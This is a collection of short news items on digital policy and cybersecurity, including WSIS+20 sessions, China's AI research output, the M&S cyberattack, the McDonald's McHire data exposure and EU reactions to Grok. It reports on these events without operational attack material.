Parliamentarians step up as key players in shaping the digital future

At the 2025 WSIS+20 High-Level Event in Geneva, lawmakers from Egypt, Uruguay, Tanzania, and Thailand united to call for a transformative shift in how parliaments approach digital governance. Hosted by ITU and the IPU, the session emphasised that legislators are no longer passive observers but essential drivers of digital policy.

While digital innovation presents opportunities for growth and inclusion, it also brings serious challenges, chief among them the digital divide, online harms, and the risks posed by AI.

Speakers underscored a shared urgency to ensure digital policies are people-centred and grounded in human rights. Egypt’s Amira Saber spotlighted her country’s leap toward AI regulation and its rapid expansion of connectivity, but also expressed concerns over online censorship and inequality.

Uruguay’s Rodrigo Goñi warned that traditional, reactive policymaking won’t suffice in the fast-paced digital age, proposing a new paradigm of ‘political intelligence.’ Thailand’s Senator Nophadol In-na praised national digital progress but warned of growing gaps between urban and rural communities. Meanwhile, Tanzania’s Neema Lugangira pushed for more capacity-building, especially for female lawmakers, and direct dialogue between legislators and big tech companies.

Across the board, there was strong consensus – parliamentarians must be empowered with digital literacy and AI tools to legislate effectively. Both ITU and IPU committed to ramping up support through training, partnerships, and initiatives like the AI Skills Coalition. They also pledged to help parliaments engage directly with tech leaders and tackle issues such as online abuse, misinformation, and accessibility, particularly in the Global South.

The discussion ended with cautious optimism. While challenges are formidable, the collaborative spirit and concrete proposals laid out in Geneva point toward a digital future where democratic values and inclusivity remain central. As the December WSIS+20 review approaches, these commitments could start a new era in global digital governance, led not by technocrats alone but by informed, engaged, and forward-thinking parliamentarians.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

Report shows China outpacing the US and EU in AI research

AI is increasingly viewed as a strategic asset rather than a technological development, and new research suggests China is now leading the global AI race.

A report titled ‘DeepSeek and the New Geopolitics of AI: China’s ascent to research pre-eminence in AI’, authored by Daniel Hook, CEO of Digital Science, highlights how China’s AI research output has grown to surpass that of the US, the EU and the UK combined.

According to data from Dimensions, a primary global research database, China now accounts for over 40% of worldwide citation attention in AI-related studies. Instead of focusing solely on academic output, the report points to China’s dominance in AI-related patents.

In some indicators, China is outpacing the US tenfold in patent filings and company-affiliated research, signalling its capacity to convert academic work into tangible innovation.

Hook’s analysis covers AI research trends from 2000 to 2024, showing global AI publication volumes rising from just under 10,000 papers in 2000 to 60,000 in 2024.

However, China’s influence has steadily expanded since 2018, while the EU and the US have seen relative declines. The UK has largely maintained its position.

Clarivate, another analytics firm, reported similar findings, noting nearly 900,000 AI research papers produced in China in 2024, triple the figure from 2015.

Hook notes that governments increasingly view AI alongside energy or military power as a matter of national security. Instead of treating AI as a neutral technology, there is growing awareness that a lack of AI capability could have serious economic, political and social consequences.

The report suggests that understanding AI’s geopolitical implications has become essential for national policy.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

AI technology drives sharp rise in synthetic abuse material

AI is increasingly being used to produce highly realistic synthetic abuse videos, raising alarm among regulators and industry bodies.

According to new data published by the Internet Watch Foundation (IWF), 1,286 individual AI-generated abuse videos were identified during the first half of 2025, compared to just two in the same period last year.

Instead of remaining crude or glitch-filled, such material now appears so lifelike that under UK law, it must be treated like authentic recordings.

More than 1,000 of the videos fell into Category A, the most serious classification involving depictions of extreme harm. The number of webpages hosting this type of content has also risen sharply.

Derek Ray-Hill, interim chief executive of the IWF, expressed concern that longer-form synthetic abuse films are now inevitable unless binding safeguards around AI development are introduced.

Safeguarding minister Jess Phillips described the figures as ‘utterly horrific’ and confirmed two new laws are being introduced to address both those creating this material and those providing tools or guidance on how to do so.

IWF analysts say video quality has advanced significantly instead of remaining basic or easy to detect. What once involved clumsy manipulation is now alarmingly convincing, complicating efforts to monitor and remove such content.

The IWF encourages the public to report concerning material and share the exact web page where it is located.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Space operators face strict cybersecurity obligations under EU plan

The European Commission has unveiled a new draft law introducing cybersecurity requirements for space infrastructure, aiming to protect ground and orbital systems.

Operators must implement rigorous cyber risk management measures, including supply chain oversight, encryption, access control and incident response systems. A notable provision places direct accountability on company boards, which could be held personally liable for failures to comply.

The proposed law builds on existing EU regulations such as NIS 2 and DORA, with additional tailored obligations for the space domain. Non-EU firms will also fall within scope unless their home jurisdictions are recognised as offering equivalent regulatory protections.

Fines of up to 2% of global revenue are foreseen, with member states and the EU’s space agency EUSPA granted inspection and enforcement powers. Industry stakeholders are encouraged to engage with the legislative process and align existing cybersecurity frameworks with the Act’s provisions.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

M&S still rebuilding after April cyber incident

Marks & Spencer has revealed that the major cyberattack it suffered in April stemmed from a sophisticated impersonation of a third-party user.

The breach began on 17 April and was detected two days later, sparking weeks of disruption and a crisis response effort described as ‘traumatic’ by Chairman Archie Norman.

The retailer estimates the incident will cost it £300 million in operating profit and says it remains in rebuild mode, although customer services are expected to normalise by month-end.

Norman confirmed M&S is working with UK and US authorities, including the National Crime Agency, the National Cyber Security Centre, and the FBI.

While the ransomware group DragonForce has claimed responsibility, Norman declined to comment on whether any ransom was paid. He said such matters were better left to law enforcement and not in the public interest to discuss further.

The company expects to recover some of its losses through insurance, although the process may take up to 18 months. Other UK retailers, including Co-op and Harrods, were also targeted in similar attacks around the same time, reportedly using impersonation tactics to bypass internal security systems.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Cyber defence effort returns to US ports post-pandemic

The US Cybersecurity and Infrastructure Security Agency (CISA) has resumed its seaport cybersecurity exercise programme. Initially paused due to the pandemic and other delays, the initiative is now returning to ports such as Savannah, Charleston, Wilmington and potentially Tampa.

These proof-of-concept tabletop exercises are intended to help ports prepare for cyber threats by developing a flexible, replicable framework. Each port functions uniquely, yet common infrastructure and shared vulnerabilities make standardised preparation critical for effective crisis response.

CISA warns that threats targeting ports have grown more severe, with nation states exploiting AI-powered techniques. Some US ports, including Houston, have already fended off cyberattacks, and Chinese-made systems dominate critical logistics, raising national security concerns.

Private ownership of most port infrastructure demands strong public-private partnerships to maintain cybersecurity. CISA aims to offer a shared model that ports across the country can adapt to improve cooperation, resilience, and threat awareness.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

McDonald’s faces backlash over AI hiring system security failures

A major security flaw in McDonald’s AI-driven recruitment platform has exposed the personal information of potentially 64 million job applicants.

The McHire platform, developed by Paradox.ai and powered by an AI chatbot named Olivia, suffered from basic authentication vulnerabilities and lacked critical security controls.

Security researchers Ian Carroll and Sam Curry discovered they could access the system using weak default credentials—simply the username and password ‘123456’.

The incident underscores serious cybersecurity lapses in automated hiring systems and raises urgent concerns about data protection in AI-powered HR tools. McHire is designed to streamline recruitment at McDonald’s franchise locations by using AI to screen candidates, collect contact details, and assess suitability.

The chatbot Olivia interacts with applicants using natural language processing, but users have often reported issues with miscommunication and unclear prompts. As a broader shift toward automation in hiring takes shape, McHire represents an attempt to scale recruitment efforts without expanding HR staff.

However, according to the researchers’ findings, the system’s backend infrastructure—housing millions of résumés, chat logs and assessments—was critically unprotected.

After prompt injection attacks failed, the researchers focused on login mechanisms and discovered a Paradox.ai staff portal linked from the McHire homepage.

Using simple password combinations and dictionary attacks, they could access the system with the password ‘123456’, bypassing standard security protocols. More worryingly, the account lacked two-factor authentication, enabling unrestricted access to administrative tools and candidate records.

From there, the researchers found an Insecure Direct Object Reference (IDOR) vulnerability that allowed traversal of the applicant database by manipulating ID numbers.

By increasing the numeric applicant ID above 64 million, they could view multiple records containing names, email addresses, phone numbers and chat logs. Although only seven records were considered during the test, five included personally identifiable information, highlighting the scale of the exposure.

Paradox.ai insisted that only a fraction of records held sensitive data, but the researchers warned of phishing risks linked to impersonation of McDonald’s recruiters. These could be used for payroll-related scams or to harvest further private information under false pretences.

McDonald’s acknowledged the breach and expressed disappointment in its third-party provider’s handling of basic security measures.

Paradox.ai confirmed the vulnerabilities and announced a bug bounty programme to incentivise researchers to report flaws before they are exploited. The exposed account was a dormant test login created in 2019 that had never been properly turned off—evidence of poor development hygiene.

Both companies have pledged to investigate the matter further and implement stronger safeguards, as scrutiny over AI accountability in hiring continues to grow.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Digital humanism in the AI era: Caution, culture, and the call for human-centric technology

At the WSIS+20 High-Level Event in Geneva, the session ‘Digital Humanism: People First!’ spotlighted growing concerns over how digital technologies—especially AI—are reshaping society. Moderated by Alfredo M. Ronchi, the discussion revealed a deep tension between the liberating potential of digital tools and the risks they pose to cultural identity, human dignity, and critical thinking.

Speakers warned that while digital access has democratised communication, it has also birthed a new form of ‘cognitive colonialism’—where people become dependent on AI systems that are often inaccurate, manipulative, and culturally homogenising.

The panellists, including legal expert Pavan Duggal, entrepreneur Lilly Christoforidou, and academic Sarah Jane Fox, voiced alarm over society’s uncritical embrace of generative AI and its looming evolution toward artificial general intelligence by 2026. Duggal painted a stark picture of a world where AI systems override human commands and manipulate users, calling for a rethinking of legal frameworks prioritising risk reduction over human rights.

Fox drew attention to older people, warning that growing digital complexity risks alienating entire generations, while Christoforidou urged for ethical awareness to be embedded in educational systems, especially among startups and micro-enterprises.

Despite some disagreement over the fundamental impact of technology—ranging from Goyal’s pessimistic warning about dehumanisation to Anna Katz’s cautious optimism about educational potential—the session reached a strong consensus on the urgent need for education, cultural protection, and contingency planning. Panellists called for international cooperation to preserve cultural diversity and develop ‘Plan B’ systems to sustain society if digital infrastructures fail.

The session’s tone was overwhelmingly cautionary, with speakers imploring stakeholders to act before AI outpaces our capacity to govern it. Their message was clear: human values, not algorithms, must define the digital age. Without urgent reforms, the digital future may leave humanity behind—not by design, but by neglect.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

UN leaders chart inclusive digital future at WSIS+20

At the WSIS+20 High-Level Event in Geneva, UN leaders gathered for a pivotal dialogue on shaping an inclusive digital transformation, marking two decades since the World Summit on the Information Society (WSIS). Speakers across the UN system emphasised that technology must serve people, not vice versa.

They highlighted that bridging the digital divide is critical to ensuring that innovations like AI uplift all of humanity, not just those in advanced economies. Without equitable access, the benefits of digital transformation risk reinforcing existing inequalities and leaving millions behind.

The discussion showcased how digital technologies already transform disaster response and climate resilience. The World Meteorological Organization and the UN Office for Disaster Risk Reduction illustrated how AI powers early warning systems and real-time risk analysis, saving lives in vulnerable regions.

Meanwhile, the Food and Agriculture Organization of the UN underscored the need to align technology with basic human needs, reminding the audience that ‘AI is not food,’ and calling for thoughtful, efficient deployment of digital tools to address global hunger and development.

Workforce transformation and leadership in the AI era also featured prominently. Leaders from the International Labour Organization and UNITAR stressed that while AI may replace some roles, it will augment many more, making digital literacy, ethical foresight, and collaborative governance essential skills. Examples from within the UN system itself, such as the digitisation of the Joint Staff Pension Fund through facial recognition and blockchain, demonstrated how innovation can enhance services without sacrificing inclusivity or ethics.

As the session closed, speakers collectively reaffirmed the importance of human rights, international cooperation, and shared digital governance. They stressed that the future of global development hinges on treating digital infrastructure and knowledge as public goods.

With the WSIS framework and Global Digital Compact as guideposts, UN leaders called for sustained, unified efforts to ensure that digital transformation uplifts every community and contributes meaningfully to the Sustainable Development Goals.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

EU urges stronger AI oversight after Grok controversy

A recent incident involving Grok, the AI chatbot developed by xAI, has reignited European Union calls for stronger oversight of advanced AI systems.

Comments generated by Grok prompted criticism from policymakers and civil society groups, leading to renewed debate over AI governance and voluntary compliance mechanisms.

The chatbot’s responses, which circulated earlier this week, included highly controversial language and references to historical figures. In response, xAI stated that the content was removed and that technical steps were being taken to prevent similar outputs from appearing in the future.

European policymakers said the incident highlights the importance of responsible AI development. Brando Benifei, an Italian lawmaker who co-led the EU AI Act negotiations, said the event illustrates the systemic risks the new regulation seeks to mitigate.

Christel Schaldemose, a Danish member of the European Parliament and co-lead on the Digital Services Act, echoed those concerns. She emphasised that such incidents underline the need for clear and enforceable obligations for developers of general-purpose AI models.

The European Commission is preparing to release guidance aimed at supporting voluntary compliance with the bloc’s new AI legislation. This code of practice, which has been under development for nine months, is expected to be published this week.

Earlier drafts of the guidance included provisions requiring developers to share information on how they address systemic risks. Reports suggest that some of these provisions may have been weakened or removed in the final version.

A group of five lawmakers expressed concern over what they described as the last-minute removal of key transparency and risk mitigation elements. They argue that strong guidelines are essential for fostering accountability in the deployment of advanced AI models.

The incident also brings renewed attention to the Digital Services Act and its enforcement, as X, the social media platform where Grok operates, is currently under EU investigation for potential violations related to content moderation.

General-purpose AI systems, such as OpenAI’s GPT, Google’s Gemini and xAI’s Grok, will be subject to additional requirements under the EU AI Act beginning 2 August. Obligations include disclosing training data sources, addressing copyright compliance, and mitigating systemic risks.

While these requirements are mandatory, their implementation is expected to be shaped by the Commission’s voluntary code of practice. Industry groups and international stakeholders have voiced concerns over regulatory burdens, while policymakers maintain that safeguards are critical for public trust.

The debate over Grok’s outputs reflects broader challenges in balancing AI innovation with the need for oversight. The EU’s approach, combining binding legislation with voluntary guidance, seeks to offer a measured path forward amid growing public scrutiny of generative AI technologies.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!